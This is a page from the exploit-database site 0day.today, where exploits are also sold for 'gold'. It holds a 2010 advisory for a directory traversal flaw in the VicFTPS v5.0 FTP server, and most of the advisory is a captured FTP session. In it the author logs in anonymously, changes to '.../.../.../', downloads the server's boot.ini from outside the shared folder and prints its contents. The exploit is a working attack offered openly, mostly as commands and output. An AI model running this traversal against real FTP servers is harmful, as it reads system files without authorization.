0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

VicFTPS v5.0 Directory Traversal

Author

chr1x

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

================================
VicFTPS v5.0 Directory Traversal
================================

# Exploit Title: VicFTPS v5.0 Directory Traversal
# Date: May 05, 2010
# Author: chr1x
# Description: A simple FTP server for Windows. Does not require an install. Very simple to configure. Supports only one user connection at a time. Supports active and passive mode transfers, MDTM, SIZE, and PASS. Version 5.0 fixed CWD Buffer overflow vulnerability. <- A new vuln here! :D
# Version: 5.0
# Tested on: Windows XP SP3 (Spanish Edition)
 
#########<VULN CONFIRMATION>#########################################
root@olovely:/ddpwn# ftp
ftp> open
(to) 192.168.1.64
Connected to 192.168.1.64.
220 VicFTPS ready
Name (192.168.1.64:ninja): anonymous
331 pretend login accepted
Password:
230 fake user logged in
Remote system type is WIN32.
ftp> ascii
200 Type set to I
ftp> cd .../.../.../
250 CWD command successful
ftp> pwd
257 "/../../"
ftp> get boot.ini
local: boot.ini remote: boot.ini
200 PORT command successful
150 Opening BINARY mode data connection
226 Transfer Complete
211 bytes received in 0.00 secs (92.1 kB/s)
ftp> bye
221 goodbye
 
root@olovely:/ddpwn# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
root@olovely:/ddpwn#
 
#########</VULN CONFIRMATION>#########################################
 
Shot from DDPwNv1.0
[*] Testing Path: .../.../.../  <- VULNERABLE! :P
 
Thiz v00d00 t00l just r0x! Ninjutzu automated hacking babe! lol.
 
http://chr1x.sectester.net



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

VicFTPS v5.0 Directory Traversal

Report Error

Report Error